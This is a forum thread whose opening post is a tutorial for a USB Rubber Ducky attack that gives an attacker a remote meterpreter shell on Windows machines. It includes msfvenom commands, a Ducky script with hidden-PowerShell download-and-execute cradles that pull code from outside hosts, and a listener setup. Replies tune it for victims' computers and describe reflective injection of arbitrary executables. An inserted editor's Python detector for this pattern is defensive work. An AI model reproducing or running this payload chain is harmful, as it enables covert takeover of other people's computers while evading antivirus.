GunZofPeace Posted February 7, 2017 (edited)

Hello again friends! Today I will give a tutorial on how to create a payload that executes in under 10 seconds and gives you a fully functioning meterpreter shell back to your Kali Linux machine. This is done in under 20 lines of script. It's quite simple and works on any Windows machine with PowerShell installed (Windows 7 and above comes preinstalled with this). I tested this first on my Windows 10 machine and it works like a charm, fully undetected by antivirus since it writes the script to memory, not to the disk. Let's begin, shall we?

Step 1: Fire up Kali Linux and open a terminal. Using msfvenom we are going to create a shellcode. Enter this code:

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=XXX LPORT=XXX -f powershell > /root/Desktop/shellcode.txt

The first part, "msfvenom", indicates that we are using that specific tool. The -p parameter indicates what payload we are using. Change the "XXX" for the LHOST parameter to your Kali Linux machine; open a terminal and enter "ifconfig" if you are unsure. As for LPORT, you can use whatever you want. Typically you use 443, 8080 or 4444. They all work. The -f parameter writes the shellcode in PowerShell format (obviously, since we're using PowerShell). And the last part after the ">" indicates the location where this payload will be saved.

STEP 2: Now we are going to upload the shellcode to GitHub or pastebin (whichever you prefer). Create a GitHub account if you do not have one at https://github.com/join?source=header-home. After doing that, make a new repository on GitHub and then upload the payload you just made (there are tutorials on Google for uploading files). You can upload the file a couple of different ways. The easiest is to just log on to GitHub from your Kali machine and upload from there. Or you can save the payload on a USB stick or somehow transfer it to your host machine and upload from there. Or if you use pastebin, upload to that!

STEP 3: Now the fun part! Time to code the ducky. Copy and paste my code and change the corresponding lines.

DELAY 500
GUI x
DELAY 1000
a
DELAY 1000
ALT y
DELAY 1000
STRING powershell -WindowStyle hidden
ENTER
DELAY 1000
STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1')
ENTER
DELAY 1000
STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/GunZofPeace/PowerSploit/master/Scripts/Meterp')
ENTER
DELAY 1000
STRING Invoke-Shellcode -Shellcode ($buf) -Force
ENTER

What is going on here is we are calling the Windows + X button, then typing "a", which opens the CMD with admin privileges. Which is awesome for us. It then fires up the command to start up PowerShell, BUT IT OPENS IT UP HIDDEN. So the actual PowerShell window is hidden!!!!!!! The only way to see that it is running is through Task Manager. Which is good for us :)

After PowerShell is started up, it downloads the command "Invoke-Shellcode" and injects it into memory. Which doesn't do much by itself. You want to keep this line the same as mine! Copy and paste it exactly. Only for the first IEX string. Now, for the second IEX string, you want to replace the last link with whatever the link to your script is on your GitHub account. Remember the one you uploaded? On GitHub, you want to click the button that says "Raw" and get that link! Then replace it between the two apostrophes. Lastly, the last line of code actually executes the payload and this is where you get your shell back on your listener. Or if you used pastebin, just place that link into the code.

To set up the listener, open up a terminal in Kali:

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST XXX (whatever IP you used, which would be your Kali machine IP)
set LPORT XXX (whatever port you used)
exploit

And there you go!

Of course, have your listener running before doing the attack. If you have any questions, please comment! This is my first actual tutorial, so feedback is wanted.

Edited February 7, 2017 by GunZofPeace
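From the defender's side, the chain in the post above leaves two distinct traces on the target: a PowerShell process launched from an elevated cmd.exe with -WindowStyle hidden (visible in process-creation events such as Security 4688 or Sysmon Event ID 1), and the two IEX/DownloadString cradles plus the Invoke-Shellcode call, which are typed interactively and so never appear in a command line but do appear in PowerShell script block logging (Event ID 4104) when it is enabled. The following is an example added by the editor, not code from the thread or from the PowerSploit project: it correlates both event types per process ID over a handful of constructed sample events and flags a process once enough weighted indicators stack up. Field names, the weights and the threshold are the editor's assumptions.

```python
"""Correlate process-creation and script-block events for the hidden-PowerShell
download-cradle pattern described in the thread. Editor's example; the sample
events below are constructed for illustration, not captured log data."""
import re
from collections import defaultdict

# Indicators drawn from the payload in the thread. Weights are an assumption.
PROCESS_INDICATORS = [
    # matches "-WindowStyle hidden" and the abbreviated "-w hidden"
    ("hidden_window", 2, re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
]
SCRIPTBLOCK_INDICATORS = [
    # IEX (New-Object Net.WebClient).DownloadString('...') style cradle
    ("download_cradle", 3,
     re.compile(r"(?:\bIEX\b|Invoke-Expression).*\.DownloadString\(", re.I)),
    # in-memory loaders named in the thread
    ("shellcode_loader", 3,
     re.compile(r"Invoke-Shellcode|Invoke-ReflectivePEInjection", re.I)),
]
# The GUI x / "a" sequence in the post yields an admin cmd.exe as the parent.
SUSPICIOUS_PARENTS = {"cmd.exe"}


def indicators_for(event):
    """Return a list of (indicator_name, weight) that one event triggers.

    event keys (assumed schema): type ('process' | 'scriptblock'), pid,
    image, parent (process events) and text (command line or script block).
    """
    hits = []
    text = event.get("text", "")
    if event["type"] == "process":
        if not event.get("image", "").lower().endswith("powershell.exe"):
            return hits
        for name, weight, pattern in PROCESS_INDICATORS:
            if pattern.search(text):
                hits.append((name, weight))
        if event.get("parent", "").lower() in SUSPICIOUS_PARENTS:
            hits.append(("cmd_parent", 1))
    elif event["type"] == "scriptblock":
        for name, weight, pattern in SCRIPTBLOCK_INDICATORS:
            if pattern.search(text):
                hits.append((name, weight))
    return hits


def find_suspicious(events, threshold=4):
    """Group indicators by PID, counting each indicator once per process.

    Returns {pid: (total_score, sorted indicator names)} for every process
    whose score reaches the threshold. A hidden launch from cmd.exe alone
    scores 3, so the default threshold also needs a script-block hit.
    """
    per_pid = defaultdict(dict)
    for ev in events:
        for name, weight in indicators_for(ev):
            per_pid[ev["pid"]][name] = weight
    return {pid: (sum(w.values()), sorted(w))
            for pid, w in per_pid.items() if sum(w.values()) >= threshold}


# Constructed sample events: PID 4120 mirrors the thread's payload, PID 5200 is benign.
SAMPLE_EVENTS = [
    {"type": "process", "pid": 4120, "parent": "cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "text": "powershell -WindowStyle hidden"},
    {"type": "scriptblock", "pid": 4120,
     "text": "IEX (New-Object Net.WebClient).DownloadString("
             "'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/"
             "master/CodeExecution/Invoke-Shellcode.ps1')"},
    {"type": "scriptblock", "pid": 4120,
     "text": "Invoke-Shellcode -Shellcode ($buf) -Force"},
    {"type": "process", "pid": 5200, "parent": "explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "text": r"powershell -NoProfile -File C:\scripts\backup.ps1"},
    {"type": "scriptblock", "pid": 5200,
     "text": "Get-ChildItem C:\\Users -Recurse | Measure-Object"},
]

if __name__ == "__main__":
    for pid, (score, names) in find_suspicious(SAMPLE_EVENTS).items():
        print(f"PID {pid}: score {score}, indicators {', '.join(names)}")
```

Script block logging is off by default, so the two 4104-based indicators only fire on hosts where it has been turned on; without it the detector degrades to the hidden-window-from-cmd.exe signal alone, which is why the threshold is set above that pair's combined weight.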
Pedrof Posted February 7, 2017

Very good. I think pastebin is better in this case because you can post anonymously, but it's just my opinion... Do you think this will work with the meterpreter/reverse_tcp?
GunZofPeace (Author) Posted February 7, 2017

Yeah, pastebin works too! I just use GitHub because I've used it in the past. And I believe so! I don't know why it wouldn't. Give it a try and let me know.
henna3 Posted February 8, 2017

Nice script man! Quick question: do you know if there is any way to convert a custom exe (of your choice) to a shellcode script? Thanks!
kleo Posted February 8, 2017

Any workarounds for the initial run of PowerShell taking up so much time to open the UAC dialog? Either choosing a longer payload execution time or plugging in twice.
GunZofPeace (Author) Posted February 8, 2017

5 hours ago, henna3 said: Nice script man! Quick question: do you know if there is any way to convert a custom exe (of your choice) to a shellcode script? Thanks!

I'm not sure. I don't see why you would do that though if the shellcode already gives you a meterpreter shell. I think the .exe has to be able to be converted into a PowerShell format, but Google it! Sorry I can't help you with this.
GunZofPeace (Author) Posted February 8, 2017

5 hours ago, kbeflo said: Any workarounds for the initial run of PowerShell taking up so much time to open the UAC dialog? Either choosing a longer payload execution time or plugging in twice.

So for this script I have the DELAY numbers quite high. It all depends on the computer specs, like how fast it is able to start up PowerShell, enter the commands, etc. Try lowering the DELAY numbers by half. It improves the speed greatly! Just test the script with different DELAYs and see how fast you can get your computer (or the victim's computer) to run the commands. Try putting 250 for the first four DELAYs. That should run it a lot quicker!
Simon Posted March 19, 2017

On 7.2.2017 at 7:39 AM, GunZofPeace said:
DELAY 500
GUI x
DELAY 1000
a
DELAY 1000
ALT y
DELAY 1000
STRING powershell -WindowStyle hidden
ENTER
DELAY 1000

I think it's possible to replace this code with:

DELAY 500
GUI R
STRING powershell -WindowStyle hidden
ENTER
DELAY 1000

It's a little bit shorter and saves time :)
PoSHMagiC0de Posted April 25, 2017

On 2/8/2017 at 8:17 AM, henna3 said: Nice script man! Quick question: do you know if there is any way to convert a custom exe (of your choice) to a shellcode script? Thanks!

If it is unmanaged code, you can do it with PowerSploit's Invoke-ReflectivePEInjection.ps1. The exe will need to be read in as a byte array to be used. You can load the PowerSploit module into memory and then load your own script that will handle pulling down the exe that you already converted to a byte array and then to base64 encoding to transfer. Decode back to a byte array and then inject into your current process or select one, with the arguments of the exe if any.

If it is managed, you might be able to do it with reflection assembly loading, but I've only done this with .NET DLLs; I do not know if it works with .NET exes.

If you really want the shellcode, it has to be unmanaged code (C, C++, no .NET). You can use a disassembler to get the opcodes or use a C compiler to dump the object, which will have the opcodes. There are tutorials online on how this is done in more detail both ways. Any way it goes, you may have to mess with it to get rid of nulls for it to be workable shellcode.

The first 2 options involve no shellcoding and no disk touching. It looks like the primary use of this topic is to use meterpreter shellcode, which msf can create for you easily. If you want to easily create shellcode to execute something, take a look at msf's payload windows/exec, which can compile an unmanaged exe or even shellcode, I believe.
syra Posted June 13, 2017

Hi! Thank you for your post. I am very new to all this and I could really use some help. I followed your instructions, so I got metasploit to start the handler but it does not create a session. I did not get any errors but it seems that the scripts, which are supposed to be running on Windows, are not communicating back to the handler (that's at least what I think is happening). The problem might be because I saved the cmd code as .bat and .cmd. I ran them both but did not notice in Task Manager that either of them started a shell. Not sure what I am doing wrong but if anybody has any idea it would be much appreciated. Thank you.
mst Posted January 2, 2022

Hi guys, I get an error on line 8 char 32 on the script. Can somebody help me please?
Qashqaw Posted February 26, 2022

On 2/7/2017 at 7:39 AM, GunZofPeace said: GUI x

I'm trying to test this script on my Windows 11 for testing, but when using GUI x it'll start Settings and goes to rename the PC (and then executes the commands as the new PC name). Should it be something else than GUI x in Windows 11 for getting access to PowerShell?
dark_pyrro Posted February 26, 2022

What language is your Windows box using? Have you set the correct language when encoding the payload?